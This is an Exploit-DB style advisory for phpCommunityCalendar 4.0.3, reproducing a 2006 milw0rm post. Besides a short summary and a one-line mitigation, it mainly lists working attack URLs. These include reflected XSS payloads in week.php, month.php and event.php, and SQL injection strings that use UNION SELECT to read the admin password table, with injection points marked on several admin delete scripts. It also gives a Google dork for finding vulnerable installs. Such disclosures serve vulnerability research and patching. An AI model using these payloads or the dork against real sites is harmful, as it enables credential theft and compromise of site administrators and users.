phpCommunityCalendar 4.0.3 Multiple Vulnerabilites

vendor:

phpCommunityCalendar

by:

X0r_1

7,5

CVSS

HIGH

XSS and SQL Injections

79, 89

CWE

Product Name: phpCommunityCalendar

Affected Version From: 4.0.3

Affected Version To: 4.0.3

Patch Exists: NO

Related CWE: N/A

CPE: a:appideas:phpcommunitycalendar

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

phpCommunityCalendar 4.0.3 Multiple Vulnerabilites

The phpCommunityCalendar 4.0.3 is vulnerable to XSS and SQL Injections. An attacker can inject malicious scripts into the LoName parameter of the week.php, month.php and event.php files. An attacker can also inject malicious SQL queries into the query parameter of the month.php, day.php, event.php, delCalendar.php, delAdmin.php, delAddress.php and delCategory.php files.

Mitigation:

Input validation should be used to prevent XSS and SQL Injections.

Source

Exploit-DB raw data:

##################################################################################
#<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<#
##################################################################################
#										 #
#	 phpCommunityCalendar 4.0.3 Multiple Vulnerabilites		         #
#										 #
##################################################################################
#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>#
##################################################################################
#										 #
#  author      : X0r_1   							 #
#  release     : 23.05.06							 #
#  software    : http://www.appideas.com/	  				 #
#  googledork  : "Calendar programming by AppIdeas.com" filetype:php   		 #
#										 #
##################################################################################

XSS:

http://[SERVER]/[PATH]/week.php?LoName=<script>alert('XSS')</script>

http://[SERVER]/[PATH]/month.php?LoName=<script>alert('XSS')</script>

http://[SERVER]/[PATH]/event.php?AddressLink="><script>alert('XSS')</script><"


SQL Injections:

http://[SERVER]/[PATH]/month.php?query=CalendarDetailsID=-1) UNION SELECT Password,0 FROM phpcalendar_adminusers WHERE AdminUserID = 1/*

http://[SERVER]/[PATH]/day.php?query=CalendarDetailsID=-1) UNION SELECT Password,0 FROM phpcalendar_adminusers WHERE AdminUserID = 1/*

http://[SERVER]/[PATH]/event.php?ID=(1=1) [SQL]

http://[SERVER]/[PATH]/admin/delCalendar.php?CalendarDetailsID=x'[SQL]

http://[SERVER]/[PATH]/admin/delAdmin.php?AdminUserID=x' [SQL]

http://[SERVER]/[PATH]/admin/delAddress.php?EventLocationID=x' [SQL]

http://[SERVER]/[PATH]/admin/delCategory.php?LocationID=x' [SQL]

# milw0rm.com [2006-05-23]